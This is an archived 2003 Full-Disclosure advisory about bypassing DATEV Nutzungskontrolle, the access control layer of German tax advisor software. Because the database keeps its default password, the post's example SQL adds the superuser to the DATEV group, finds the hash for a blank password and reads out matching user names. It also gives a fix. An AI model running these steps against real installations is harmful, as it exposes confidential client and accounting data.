|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-Disclosure] (no subject)
t4rku5
hushmail.com
Date: Fri Oct 31 2003 - 07:20:28 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Topic: DATEV Nutzungskontrolle Bypassing
Release Date: 2003-10-31
Affected system:
================
- Nutzungskontrolle V.2.2
- Nutzungskontrolle V.2.1
Unaffected system:
==================
- none known
Summary:
========
DATEV eG is a German Company, which makes Software for tax advisors and
lawyers. The Nutzungskontrolle (NUKO) is a Software to restrict the
access for the users. For example, a normal user is not allowed to see
the internal reward accounting data. These data are restrictet by the
NUKO by, for example, blocking the "advisor number", which is used for
all data in the internal reward accounting.
Issue:
======
It is possible to find out simple or blank passwords in the NUKO, by
searching in the NUKO Database.
The Problem is that DATEV changed the default database password for all
their databases, except for the NUKO DB. At the moment the Sybase ASA
Database is used to manage this stuff. I will not write the login
password down here, because i think it is no problem to find this with
google.
1. First you have to add the default superuser to the group DATEV:
example:
GRANT MEMBERSHIP
IN GROUP DATEV
TO "the superuser login" (without "")
2. Then just make a query to the table u_nkw_passwords for the colum
nk_password to check where a password hash
3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D
is.
example:
select nk_user_id from u_nkw_passwords where nk_password =
'3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D3D7595A98BFF809D'
3. Now query the user name of the nk_user_id.
example:
select nk_user_name from u_nkw_users where nk_user_id = 'one of the
userid from 2.'
4. Now you have a NUKO login with a blank Password.
Workaround:
===========
Change the default database password.
Credits:
========
Discovered by t4rku5
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434
Promote security and make money with the Hushmail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]